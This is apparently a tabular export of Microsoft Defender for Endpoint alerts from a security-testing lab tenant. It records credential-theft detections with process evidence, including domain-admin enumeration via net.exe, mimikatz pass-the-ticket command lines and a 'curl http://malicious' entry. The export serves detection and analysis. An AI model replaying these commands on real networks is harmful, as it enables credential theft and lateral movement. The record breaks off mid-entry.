"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:07:54.3366667Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"net.exe\" group \"Enterprise Admins\" /domain",
"processCreationTime": "2022-11-21T02:05:25.0260612Z",
"processId": 11708,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:13:55.6133333Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"net.exe\" group /domain",
"processCreationTime": "2022-11-21T02:11:21.7450764Z",
"processId": 4224,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:14:04.94Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"net.exe\" group \"Domain Admins\" /domain",
"processCreationTime": "2022-11-21T02:11:21.7952738Z",
"processId": 1176,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:15:49.0366667Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"net.exe\" group /domain",
"processCreationTime": "2022-11-21T02:13:39.1743954Z",
"processId": 10884,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:15:49.1933333Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"net.exe\" group \"Domain Admins\" /domain",
"processCreationTime": "2022-11-21T02:13:39.2339429Z",
"processId": 5540,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:17:50.8533333Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"net.exe\" group /domain",
"processCreationTime": "2022-11-21T02:15:37.0643284Z",
"processId": 9752,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:23:46.3766667Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"net.exe\" group /domain",
"processCreationTime": "2022-11-21T02:21:54.4135787Z",
"processId": 2072,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:23:47.26Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"net.exe\" group \"Domain Admins\" /domain",
"processCreationTime": "2022-11-21T02:21:54.462992Z",
"processId": 9500,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:25:47.07Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"net.exe\" group /domain",
"processCreationTime": "2022-11-21T02:24:17.0125413Z",
"processId": 10712,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:25:49.0866667Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\system32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"net.exe\" group /domain",
"processCreationTime": "2022-11-21T02:23:22.6572203Z",
"processId": 2468,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:32:45.25Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\system32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"net.exe\" group /domain",
"processCreationTime": "2022-11-21T02:30:51.8017458Z",
"processId": 9404,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:33:01.8233333Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"net.exe\" group \"Domain Admins\" /domain",
"processCreationTime": "2022-11-21T02:30:51.8486166Z",
"processId": 2256,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:33:46.3333333Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"net.exe\" group \"Domain Admins\" /domain",
"processCreationTime": "2022-11-21T02:23:22.6947155Z",
"processId": 8728,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:39:04.8833333Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"net.exe\" group /domain",
"processCreationTime": "2022-11-21T02:32:52.7764923Z",
"processId": 11008,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:39:05.3266667Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\system32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"net.exe\" group \"Domain Admins\" /domain",
"processCreationTime": "2022-11-21T02:32:52.8194421Z",
"processId": 10200,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-13T20:36:54.8233333Z | Suspicious | None | alice | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-09-30T06:14:46.34Z | Suspicious | None | jeff | staging.net | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-12-22T08:59:19.0966667Z | Suspicious | None | jeff | MSDXV8 | S-1-5-21-2159906967-4174806019-1002223092-1104 | null | jeff@msdxv8.m365dpoc.com | 70df765f554ed7392200422c18776b8992c09231 | 912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9 | mimikatz.exe | C:\M365DAttack\Mimikatz\x64 | 6,932 | curl http://malicious | 2022-12-22T08:47:53.5760604Z | 6,324 | 2022-12-22T08:47:11.8139068Z | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | Detected | 7ba8aa008687dd62d639cb45b52c7c9f971c65c1 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-11T08:28:43.7466667Z | Suspicious | None | ronhd | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1111 | 89b6fc86-af84-47b2-a72d-325362598b2c | ronhd@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638045931470659526_1077639846 | 58f9697c-4be9-4140-af1f-34d50cbbe085 | 765 | MicrosoftDefenderForEndpoint | 2022-11-21T02:05:47.0659755Z | 2022-11-26T01:35:43.17Z | 2022-11-26T01:35:43.0633333Z | 2022-11-21T02:02:27.1005817Z | 2022-11-21T02:15:09.1240511Z | Malicious credential theft tool execution detected | A known credential theft tool execution command line was detected.
Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more. | CredentialAccess | Resolved | High | null | UnsupportedAlertType | TruePositive | SecurityTesting | WindowsDefenderAtp | f5d3c5d8-ec3a-4412-ab45-934d8faff42c | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1003"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "prod.env",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "None",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] | [
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:05:47.11Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:05:47.11Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"kerberos::ptt C:\\M365DAttack\\Admin-Tickets\" exit",
"processCreationTime": "2022-11-21T02:02:26.7968671Z",
"processId": 1648,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:09:04.2266667Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"kerberos::ptt C:\\M365DAttack\\Admin-Tickets\" exit",
"processCreationTime": "2022-11-21T02:06:53.2225756Z",
"processId": 5292,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:13:44.4033333Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"kerberos::ptt C:\\M365DAttack\\Admin-Tickets\" exit",
"processCreationTime": "2022-11-21T02:11:49.9793886Z",
"processId": 11992,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:17:47.6333333Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"kerberos::ptt C:\\M365DAttack\\Admin-Tickets\" exit",
"processCreationTime": "2022-11-21T02:15:09.1186923Z",
"processId": 10936,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-22T08:59:19.3466667Z | Suspicious | None | jeff | rnd.local | S-1-5-21-2159906967-4174806019-1002223092-1104 | null | jeff@msdxv8.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-22T08:59:39.6033333Z | Unknown | None | steve | MSDXV8 | S-1-5-21-2159906967-4174806019-1002223092-1107 | null | steve@msdxv8.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638072957260831204_733079840 | 1f966e67-4aab-4f48-ac7e-dd189e13a417 | 975 | MicrosoftDefenderForEndpoint | 2022-12-22T08:48:46.08314Z | 2022-12-22T08:48:47.25Z | null | 2022-12-22T08:47:29.0129963Z | 2022-12-22T08:47:29.0129963Z | Malicious credential theft tool execution detected | A known credential theft tool execution command line was detected.
Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more. | CredentialAccess | New | High | null | UnsupportedAlertType | null | null | WindowsDefenderAtp | f5d3c5d8-ec3a-4412-ab45-934d8faff42c | null | null | null | [
"T1003"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv8-win10v.msdxv8.m365dpoc.com",
"firstSeen": "2022-12-08T05:21:19.944Z",
"healthStatus": "Inactive",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV8"
}
],
"mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "Critical",
"tags": [],
"version": "1809",
"vmMetadata": null
}
] | [
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:48:46.11Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
